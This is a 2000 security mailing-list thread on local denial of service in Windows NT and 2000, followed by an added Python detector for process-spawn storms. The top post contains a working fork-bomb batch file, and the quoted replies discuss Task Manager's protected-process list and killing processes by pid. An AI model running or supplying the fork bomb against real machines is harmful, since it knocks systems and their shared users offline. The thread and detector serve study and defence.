Subject: Re: Win2K Local DoS?
From: Nicolas Rachinsky (rnicolasGMX.NET)
Date: Tue Aug 08 2000 - 14:47:43 CDT


Try the following to kill any NT4 machine I know of (up to SP5, including Terminal Server).
Start the following batch file.
---sexporn.bat----
:a
start sexporn.bat
goto a

----
It rendered all the test machines unusable within a few seconds.
Nicolas

----- Original Message -----
From: Kevin Stephenson <kevin.stephensonPOBOX.COM>
To: <VULN-DEVSECURITYFOCUS.COM>
Sent: Sunday, August 06, 2000 6:57 AM
Subject: Re: Win2K Local DoS?

> I'm a bit out of my league here, but if a company wanted to physically
> secure their hardware (at least the power button and cord) and try to
> harden their Win2k Pro boxes in order to try and get some Orange Book level
> certification, aren't they fundamentally screwed because of things like
> this? I think this idea can be further developed into a nasty little DoS
> attack somehow. See page 550 in the Win2K Pro Resource Kit. It has some
> information about Increase Quotas and Increase Scheduling Priority Local
> Policies.
>
> It might be a good idea to write a program that runs as a service at the
> Local System level that monitors for rogue processes and lowers their
> priorities to thwart a DoS attack in lieu of process quotas, which appear
> to be missing in all Microsoft OSes. This would be a non-trivial
> programming task. So much for being an Enterprise class OS. Apparently any
> half-wit can take down an Advanced/Datacenter server.
>
> At 07:19 PM 8/5/2000 +0200, you wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On 2000-08-04 at 10:14 Maxime Rousseau wrote:
>
> >Oliver Friedrichs says:
> >! Once you have execute permission on a Windows system there's not
> >! a lot limiting you from using resources.
> >
> >Very true, I fail to see the use of a local DoS. If you want to kill
> >the machine the 'shutdown' feature comes to mind.
>
> Only in Windows 2000 Professional do normal users have the privilege
> to shut down the machine, but this can be revoked by an administrator.
> Normally that's a moot point, since the plug can always be pulled, of
> course. :-)
>
> But if you consider Windows 2000 (Advanced) Server, which also
> includes Terminal Services, this really can be an effective DoS,
> since you can keep the CPU at 100%, and refuse to log out. Then
> again, you could also do this with a main(){for(;;);} type thingy. I
> am not aware of any option to set CPU quota in Windows 2000, but
> please correct me if I'm wrong.
>
> >Dimitry Andric says:
> >! It simply checks for some reserved names, such as services.exe,
>
> To follow up on myself here, examination of the taskmgr.exe file
> indicates that the list of "unkillable" processes consists of:
> services.exe, smss.exe, winlogon.exe, csrss.exe and dllhost.exe.
> Strangely lsass.exe and some others aren't even included, while
> they're certainly critical. This now seems to be even more of a
> last-minute hack from the taskmgr developers than I thought at first.
> ;-)
>
> >However I'm not quite sure to
> >understand how you would not be able to use an OpenProcess() for
> >something called services.exe.
>
> OpenProcess() is called with a process id, not with a name. You
> look up the pid in the task manager list, pass it to OpenProcess() to
> get a handle, and pass that to TerminateProcess() to finish off the
> process. However, even as an administrator, calling OpenProcess()
> with the pid of most of these system processes will fail with an
> "Access denied" error. So you can't terminate those processes in this
> manner (there are other ways, though). The NT4 version of Task
> Manager just displays these errors if you try to kill any of the
> system processes.
>
> >IMHO, this is a rather serious flaw in the task manager. Imposing
> >restrictions or assuming a critical process by a string match on its
> >name is not even bad, it's downright evil (i wonder if i rename my
> >account administrator... heh). Maybe someone should contact MS?
>
> I think they'll just say that if you have local access, you can DoS
> the machine anyway. The only argument for removing this "feature" is
> that it's prone to misuse by trojans and the like. You couldn't kill
> services.exe anyway, so it can only be called superfluous.
>
> Cheers,
> - --
> Dimitry Andric <dimxs4all.nl>
> PGP key: http://www.xs4all.nl/~dim/dim.asc
> KeyID: 4096/1024-0x2E2096A3
> Fingerprint: 7AB4 62D2 CE35 FC6D 4239 4FCD B05E A30A 2E20 96A3
>
> -----BEGIN PGP SIGNATURE-----
> Version: Encrypted with PGP Plugin for Calypso
> Comment: http://www.gn.apc.org/duncan/stoa_cover.htm
>
> iQA/AwUBOYw+mbBeowouIJajEQKOFwCaAgXojCfYFYP7qBdhFlTyKt1IVLYAn1Iv
> 1EOhRF0Bwm1z5PtRn+oxyJhy
> =QmuF
> -----END PGP SIGNATURE-----
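Added example, not written by any poster in this thread: a small detector for the self-replicating batch file Nicolas describes, taking the defender's side of the discussion. Two points from the thread shape it. Kevin asks for a service that spots rogue processes in lieu of quotas; Maxime and Dimitry note that keying a control on a process *name* (as Task Manager does) is worthless because the name can be changed. So the rule below ignores the batch file's name entirely and keys on behaviour: a burst of processes whose image equals their parent's image, under one account, inside a short window. The audit-event line format, the user names, pids and thresholds are all constructed for the example; on NT each `start` of a batch file produces a new cmd.exe, so the image seen in a real event stream would be cmd.exe rather than the .bat name.

```python
"""Detect fork-bomb-style process storms from process-creation audit events.

Example code added to this thread; not from any poster. The event line format
is a constructed, simplified stand-in for Windows "process created" audit
records: "<ISO time> user=<name> ppid=<n> pid=<n> image=<file>".
"""
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class ProcEvent:
    ts: datetime
    user: str
    ppid: int
    pid: int
    image: str


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed audit line into a ProcEvent (image lower-cased)."""
    ts_str, rest = line.split(" ", 1)
    fields = dict(kv.split("=", 1) for kv in rest.split())
    return ProcEvent(datetime.fromisoformat(ts_str), fields["user"],
                     int(fields["ppid"]), int(fields["pid"]), fields["image"].lower())


def detect_spawn_storm(lines, threshold=20, window_s=5.0):
    """Return alerts as (user, image, count).

    An alert fires once per (user, image) when more than `threshold`
    self-spawned children (child image == parent image) are created within
    `window_s` seconds. Ordinary process creation (explorer -> notepad) is
    ignored, and the rule never looks at a script or batch file name, so
    renaming sexporn.bat does not evade it.
    """
    image_of_pid = {}             # pid -> image, so a child can find its parent's image
    recent = defaultdict(deque)   # (user, image) -> timestamps of recent self-spawns
    alerts, alerted = [], set()
    for line in lines:
        ev = parse_event(line)
        parent_image = image_of_pid.get(ev.ppid)
        image_of_pid[ev.pid] = ev.image
        if parent_image != ev.image:
            continue                      # not self-replication
        key = (ev.user, ev.image)
        q = recent[key]
        q.append(ev.ts)
        while q and (ev.ts - q[0]).total_seconds() > window_s:
            q.popleft()                   # age out events outside the window
        if len(q) > threshold and key not in alerted:
            alerted.add(key)
            alerts.append((ev.user, ev.image, len(q)))
    return alerts


def constructed_sample():
    """Constructed event stream: benign activity for two users plus one storm."""
    base = datetime(2000, 8, 8, 14, 47, 0)
    lines = [
        f"{base.isoformat()} user=alice ppid=1 pid=4 image=explorer.exe",
        f"{(base + timedelta(seconds=1)).isoformat()} user=alice ppid=4 pid=5 image=notepad.exe",
        # alice double-clicks the batch file: explorer launches the first cmd.exe
        f"{(base + timedelta(seconds=2)).isoformat()} user=alice ppid=4 pid=100 image=cmd.exe",
    ]
    # 25 generations of cmd.exe starting cmd.exe, 50 ms apart (the ':a / start / goto a' loop)
    t0 = base + timedelta(seconds=2)
    for i in range(1, 26):
        ts = t0 + timedelta(milliseconds=50 * i)
        lines.append(f"{ts.isoformat()} user=alice ppid={99 + i} pid={100 + i} image=cmd.exe")
    # bob runs a few nested shells by hand: same image chain, far below threshold
    t1 = base + timedelta(seconds=10)
    lines.append(f"{t1.isoformat()} user=bob ppid=1 pid=200 image=cmd.exe")
    for i in range(1, 4):
        ts = t1 + timedelta(seconds=i)
        lines.append(f"{ts.isoformat()} user=bob ppid={199 + i} pid={200 + i} image=cmd.exe")
    return lines


if __name__ == "__main__":
    for user, image, count in detect_spawn_storm(constructed_sample()):
        print(f"ALERT: {user} spawned {count} self-replicating {image} processes")
```

The alert here is the detection half of what Kevin describes; a responder acting on it would still have to deal with the process tree, and the thread's own observation applies: terminate by pid and parent relationship, never by matching a name.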